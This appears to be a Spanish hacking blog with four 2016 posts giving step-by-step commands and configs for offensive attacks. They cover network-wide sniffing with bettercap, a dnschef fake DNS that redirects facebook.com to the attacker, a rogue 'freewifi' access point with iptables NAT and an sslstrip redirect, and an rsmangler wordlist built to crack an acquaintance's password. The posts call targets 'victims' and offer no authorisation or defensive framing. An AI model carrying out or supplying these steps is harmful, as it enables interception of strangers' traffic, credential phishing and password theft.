viernes, 24 de junio de 2016

bettercap

Bettercap es un nuevo método para ataques MITM.

En primer lugar, instalamos las dependencias

apt-get install build-essential ruby-dev libpcap-de
Después, nos descargamos bettercap de https://github.com/evilsocket/bettercap



Descomprimimos y ejecutamos

gem build bettercap.gemspec

Instalamos:

gem install bettercap*.gem

Ahora bien, para ejecutarlo, nos metemos en el directorio bin:

Para esnifar toda la red, símplemente ponemos:

./bettercap -X



Para pararlo, basta con pulsar CTRL+C

Para guardarlo todo en un fichero, utilizaremos -O NOMBRE_FICHERO.

Otras opciones, con -h.




viernes, 17 de junio de 2016

Crear un servidor DNS falso

Un servidor DNS, por si no lo sabéis, nos traduce una dirección como www.google.com a su dirección IP. Realmente, internet funciona con las direcciones IP, sin embargo, como son difíciles de recordar, se utilizan estos nombres, llamados nombres de dominio.

Existen por internet los llamados DNS, que son los que se encargan de traduciros y, si podréis visitar esta página, eso es que estáis utilizando uno, el de vuestro proveedor de internet.

Nuestro objetivo es crear un DNS falso, que traduzca alguna dirección concreta a una página malicios (incluso, si queremos, que ésta esté en nuestro propio equipo).

Realmente no es un servidor DNS real, sino un proxy DNS.

Utilizaremos dnschef, incluída en Kali Linux.



Si queremos que este proxy sea externo, necesitaremos entrar en nuestro router y abrir el puerto 53.

Además, necesitaremos nuestra ip externa, para ello, consultar con http://www.whatismyip.com

Utilicaremos dnschef, si no lo tenemos instalado, o bien lo instalamos con apt-get install dnschef o bien lo descargamos dnschef de https://thesprawl.org/projects/dnschef/

Ahora, vamos a modificar el archivo de configuración dnschef.ini



Ejecutamos

./dnschef.py -i IP_LOCAL




Todos los dominios que definimos anteriormente en el archivo /root/dnschef.conf serán redirigidos a mí, sin embargo, si piden otros (p. ej. www.realmadrid.es) los redigirá a la IP 8.8.8.8 , que es la IP del DNS de google, para que la víctima tenga respuesta.

Y si creamos una página, ejecutamos el servidor apache y ponemos:

./dnschef.py -i IPLOCAL --fakedomains=facebook.com --fakeip=IPLOCAL






viernes, 10 de junio de 2016

Crear una red wifi falsa

En primer lugar, vamos a crear el escenario siguiente:

10.0.0.0 → Red falsa.
192.168.1.0 → Red real.

eth0 → Tarjeta de red conectada a internet.
wlan0 → Tarjeta de red que dará el acceso wifi.
En primer lugar, deberemos instalar el servidor dhcp

En kali Linux 2 Rolling, editaremos el archivo de fuentes /etc/apt/sources.list

añadimos:
deb http://http.kali.org/kali kali-rolling main contrib non-free



apt-get update

apt-get install isc-dhcp-server

editamos /etc//dhcpd/dhcpd.conf y añadimos:

authoritative;
default-lease-time 1000;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name “freewifi”;
option domain-name-servers IP_DEL_DNS_DE_TU_PROVEEDOR;
range 10.0.0.2 10.0.0.40;
}

Si tienes Kali Linux 2 o Rolling, editamos el archivo /etc/NeworkManager/NetworkManager.conf y añadimos:

[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon



ifconfig wlan0 up

airmon-ng start wlan0

airbase-ng -c 1 -e freewifi wlan0mon



Si usáis Virtual Box y os da un error, probad con poner la habilitación USB 3.0 en la configuración de la máquina virtual.

Abrimos una nueva terminal

Vamos poniendo lo siguiente:

ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

Si os da un error, tenéis que poner touch /var/lib/dhcp/dhcpd.leases y volvéis a poner dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start



Si la víctima no consigue obtener la IP, reinstalar aircrack-ng con apt-get install aircrack-ng para que actualice airbase-ng.

Si queremos usar ssltrip u otro proxy, deberemos, cuando configuremos iptables, poner también:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

(en el caso de sstrip. Usar la configuración que sea para el proxy que utilicéis)-




viernes, 3 de junio de 2016

Crear un diccionario a medida

En este post, vamos a crear un diccionario con palabras específicas.

Esto sirve, por ejemplo, si queremos sacar la contraseña de un conocido y conocemos, obviamente, datos personales suyos.

En primer lugar, abrimos la consola de Kali y editamos un archivo con distintas palabras relacionadas con el conocido, también pueden ser números.



Usaremos rsmangler, que ya viene instalado por defecto.

Las opciones son las siguientes:

rsmangler v 1.4 Robin Wood (robin@digininja.org) <www.randomstorm.com>

To pass the initial words in on standard in do:

cat wordlist.txt | ./rsmangler.rb --file - > new_wordlist.rb

All options are ON by default, these parameters turn them OFF

Usage: rsmangler.rb [OPTION]
        --help, -h: show help
        --file, -f: the input file, use - for STDIN
        --max, -x: maximum word length
        --min, -m: minimum word length
        --perms, -p: permutate all the words
        --double, -d: double each word
        --reverse, -r: reverser the word
        --leet, -t: l33t speak the word
        --full-leet, -T: all posibilities l33t
        --capital, -c: capitalise the word
        --upper, -u: uppercase the word
        --lower, -l: lowercase the word
        --swap, -s: swap the case of the word
        --ed, -e: add ed to the end of the word
        --ing, -i: add ing to the end of the word
        --punctuation: add common punctuation to the end of the word
        --years, -y: add all years from 1990 to current year to start and end
        --acronym, -a: create an acronym based on all the words entered in order and add to word list
        --common, -C: add the following words to start and end: admin, sys, pw, pwd
        --pna: add 01 - 09 to the end of the word
        --pnb: add 01 - 09 to the beginning of the word
        --na: add 1 - 123 to the end of the word
        --nb: add 1 - 123 to the beginning of the word
        --force - don't check ooutput size
        --space - add spaces between words
tendremos que poner

rsmangler OPCIONES -f FICHERO_ORIGINAL - > FICHERO DESTINO


Ahora ya solo falta esperar.